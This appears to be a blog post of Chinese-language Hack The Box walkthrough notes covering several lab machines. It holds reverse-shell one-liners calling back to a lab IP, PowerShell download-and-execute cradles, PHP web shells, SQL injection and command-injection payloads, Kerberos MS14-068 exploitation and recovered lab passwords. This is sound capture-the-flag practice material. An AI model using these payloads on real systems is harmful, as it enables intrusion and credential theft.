hackthebox通關手記（持續更新）

簡介：

花了點時間弄了幾道題目。以前我是用windows滲透居多，在kali linux下滲透測試一直不怎么習慣。通過這幾天做這些題目感覺順手多了。有些題目腦洞也比較大，感覺很多也不適合於實際的環境

 

10.10.10.5

這題比較簡單，ftp可以匿名登錄並且可以put文件：anonymous，上傳一句話或者是大馬即可
期間有一個問題就是：大馬下的shell不能type root.txt
我只好上傳nc反彈才成功,反彈常用端口53，443。
C:\inetpub\wwwroot\nc.exe -e cmd.exe 10.10.xx.xx 443
Nc -lvvp 443

 

10.10.10.6

上傳torrent，編輯圖片上傳test.php.png 利用菜刀上傳到/tmp
Python back.py 10.10.14.22 1234
Nc -lvvp 1234
上傳exp執行成功 cat root

10.10.10.7
elastaix 2.2本地文件包含漏洞
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action
hydra 破解收集到的用戶密碼

10.10.10.8
HFS遠程代碼執行漏洞

tcpdump -I tun0
遠程執行ps1腳本
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.22:8000/’)

Sublime Invoke-PowerShellTcp.ps1

/?search==%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1').}

nc -lvvp 1337
發現 存在的漏洞：
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1')
執行ms16032並加載shelltcp.ps1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-MS16032.ps1')

nc -lvvp 1338

10.10.10.9

Drupal（水滴）cms漏洞利用遠程代碼執行

Apt-get install php7.2-curl  需要裝2018.2的kali，不然就是需要升級。我發現php7木有合適的php-curl模塊
Php exploit.php。需要把php自己修改一下。 修改成一句話木馬即可，畢竟國人我還是適應用菜刀。sad

update-alternatives --config java     更換一下java就可以使用knife了

 

10.10.10.10
這個漏洞挺有意思的。
Wpscan 枚舉到用戶名takis

steghide extract -sf HackerAccessGranted.jpg 會導出id_rsa

ssh2john id_rsa > id_john
john id_john --wordlist=password.txt

ssh I id_rsa takis@10.10.10.10
superpassword
sudo /bin/fuckin bash

10.10.10.16
octobercms 掃目錄backend 用戶名密碼：admin:admin 上傳php5

迎合國際風格，實驗環境直接用<?php echo system($_REQUEST['cmd']);?>

 

10.10.10.22

需要設置hosts
vi /etc/hosts

10.10.10.24
這題何有意思
curl直接下載

python -m SimpleHTTPServer

http://10.10.10.24/uploads/sec.php?sec=nc -e /bin/sh 10.10.14.22 8088

python3 -c 'import pty; pty.spawn("/bin/bash")'

 

10.10.10.31
在忘記密碼處可以注入

a@b.c' uniOn select 1,2,3,concat(__username_,"@example.com") FROM supercms.operators limit 1,1 -- -
a@b.c' uniOn select 1,2,3,concat(__password_,"@example.com") FROM supercms.operators limit 1,1 -- -
super_cms_adm
tamarro

反彈shell，其實不反彈也可以

sec=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f=

Pip install gmpy2 出錯

apt-cache search libmpfr
find /usr -type f -name "libmpfr.s*"
ln -sf /usr/lib/x86_64-linux-gnu/libmpfr.so.6.0.1 /usr/lib/libmpfr.so.4

解決在此：https://blog.csdn.net/wanzt123/article/details/71036184?locationNum=8&fps=1

python RsaCtfTool.py --publickey /root/Desktop/crypt/decoder.pub --uncipherfile /root/Desktop/crypt/pass.crypt

nevermindthebollocks

supershell ‘/bin/ls$(cat /root/root.txt)’

10.10.10.37

在plugins目錄下面有個jar，可以利用jd-gui反編譯出MySQL的用戶名和密碼。

public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

phpmyadmin 一般有兩種知道web路徑導出shell、通過日志拿shell或者破解密碼進入wp在后台getshell

利用密碼猜解notch用戶密碼都是MySQL的密碼

 

10.10.10.47

Donkey:d0nk3y1337!

import seccure
second = "\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa\"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w"
print seccure.decrypt(second, "PrinceCharming")
Sec shr3k1sb3st!

touch — — reference=thoughts.txt

10.10.10.48

比較有意思，樹莓派系統pi-hole 系統是Raspbian，有個默認賬戶密碼：pi：raspberry用ssh登陸cat user.txt

Sudo -i 可以切換到root權限cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Sudo strings /dev/sdb即可

 

10.10.10.52

Sa m$$ql_S@_P@ssW0rd!
james@htb.local james J@m3s_P@ssW0rd!

git clone impacket

apt-get install krb5-user cifs-utils rdate
sublime /etc/hosts
10.10.10.52 mantis.htb.local mantis

sublime /etc/krb5.conf

[libdefaults]
default_realm = HTB.LOCAL

[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL

rdate -n 10.10.10.52

kinit james

rpcclient -U james 10.10.10.52

lookupnames james
S-1-5-21-4220043660-4019079961-2895681657-1103

python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis

cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0
J@m3s_P@ssW0rd!

cd impacket
python setup.py install

python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local

10.10.10.60

/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+"<%3fphp+%40eval(base64_decode('ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsg'))%3b%3f>">wup.php

Wup.php?cmd=cat /root/root.txt

 

 

10.10.10.65

sslyze --regular 10.10.10.65
Imagetrick

10.10.10.63
Jenkins為授權訪問

http://10.10.10.63:50000/askjeeves/script